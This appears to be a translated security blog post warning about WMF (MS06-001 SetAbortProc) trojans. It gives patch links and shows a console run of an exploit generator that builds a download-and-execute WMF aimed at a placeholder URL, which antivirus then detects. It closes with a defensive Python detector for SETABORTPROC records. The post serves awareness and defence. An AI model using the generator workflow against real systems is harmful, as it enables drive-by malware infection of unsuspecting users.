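The Spring Festival is almost here, so be careful of WMF trojans when you go online over the holiday. This kind of trojan has already started to spread. For background on WMF trojans, see the following articles:
MS06-001 released early to patch the WMF 0-day vulnerability
Exploit.WMF.SetAbortProc
Further research on the WMF 0-day vulnerability
QQ Tail (QQ尾巴) also takes an interest in the WMF vulnerability
WMF web trojan planted on "模特在线" (Models Online)
WMF web trojan planted on the forum of Bao Jianfeng's (保剑锋) official website
WMF web trojan generators will become hackers' new favorite
To avoid infection, install the patch for the WMF vulnerability:
Official patch: http://www.microsoft.com/china/technet/Security/bulletin/ms06-001.mspx
Third-party patch: http://www.hexblog.com/2005/12/wmf_vuln.html
Alternatively, update your antivirus software and turn on real-time monitoring while you are online. At present, most AV products can detect these WMF trojans (click here to see KV's test results).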
----------- cut here------------
f:\wmf_maker>ms0601 http://xxx.xxx.xxx.xxx/xxx.exe
Microsoft Windows WMF Download and Exec Exploit
-----------------------------------------------
based on wmf_exp.wmf, shellcode from thc shellc0de@2006 Compiled by www.yibujh.com
[+] Using URL: http://xxx.xxx.xxx.xxx/xxx.exe
[+] Opening exploit.wmf: Ok!
[+] Writing Header: Ok!
[+] Writing Shellcode: Ok!
[+] Writing Nops: Ok!
[+] Writing Footer: Ok!
[+] Done!
f:\wmf_maker>kv exploit.wmf
KVD3000 32bit version 9.000A, (c) Jiangmin, inc, 1998-2004
Load kvlb\KVA.VLB....
Load kvlb\kvb.vlb...
Load kvlb\kvc.vlb...
Load kvlb\kvd.vlb...
Load kvlb\kve.vlb...
Load kvlb\kvf.vlb...
Load kvlb\kvg.vlb...
Load kvlb\kvh.vlb...
Load kvlb\kvi.vlb...
Load kvlb\kvj.vlb...
Load kvlb\KVK.VLB...
Load kvlb\kvl.vlb...
Load kvm.vlb...
Load kvlb\kvn.vlb...
f:\wmf_maker\exploit.wmf found: Exploit.WMF.SetAbortProc
Total 1 files scaned.
Total 1 virus bodies found, 1 virus varieties, 0 warning
Total 0 exepack inspected, 0 files extracted from 0 compressed files.
Scan time: 0:00:00
----------- cut here------------
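For readers who want to triage .wmf files themselves, here is one way to flag the construct the detection name above refers to. This is an added example, not code from the original post or from any AV product: it walks the metafile records and reports every META_ESCAPE record whose escape function is SETABORTPROC. The record layout follows Microsoft's published WMF format, the function and sample names are made up for the example, and the sample files are constructed with an empty placeholder payload.

```python
import struct

PLACEABLE_MAGIC = 0x9AC6CDD7  # optional 22-byte placeable header before META_HEADER
META_ESCAPE = 0x0626          # RecordFunction value of an Escape record
META_EOF = 0x0000
SETABORTPROC = 0x0009         # escape function a picture file has no reason to use

def find_setabortproc(data: bytes) -> list[int]:
    """Return file offsets of META_ESCAPE records that request SETABORTPROC."""
    pos = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC:
        pos = 22
    if len(data) < pos + 18:
        raise ValueError("too short for a WMF header")
    mtype, header_words = struct.unpack_from("<HH", data, pos)
    if mtype not in (1, 2) or header_words != 9:
        raise ValueError("not a WMF header")
    pos += header_words * 2                 # sizes are counted in 16-bit words
    hits = []
    while pos + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, pos)
        if size_words < 3:                  # malformed size: stop instead of looping
            break
        if func == META_ESCAPE and pos + 8 <= len(data):
            (escape,) = struct.unpack_from("<H", data, pos + 6)
            if escape == SETABORTPROC:
                hits.append(pos)
        if func == META_EOF:
            break
        pos += size_words * 2
    return hits

def _build(records):
    """Assemble a constructed sample metafile from raw records (test data only)."""
    body = b"".join(records) + struct.pack("<IH", 3, META_EOF)
    biggest = max(len(r) for r in records) // 2
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0, biggest, 0)
    return header + body

SET_BK_MODE = struct.pack("<IHH", 4, 0x0102, 1)   # ordinary drawing record
ESCAPE_REC = struct.pack("<IHHH", 7, META_ESCAPE, SETABORTPROC, 4) + b"\x00" * 4
BENIGN = _build([SET_BK_MODE])                     # constructed, harmless
SUSPECT = _build([SET_BK_MODE, ESCAPE_REC])        # constructed, payload is zeros

if __name__ == "__main__":
    print("benign :", find_setabortproc(BENIGN))
    print("suspect:", find_setabortproc(SUSPECT))
```

A hit is a reason to quarantine the file regardless of its extension, since Windows identifies metafiles by content and a renamed file is parsed the same way.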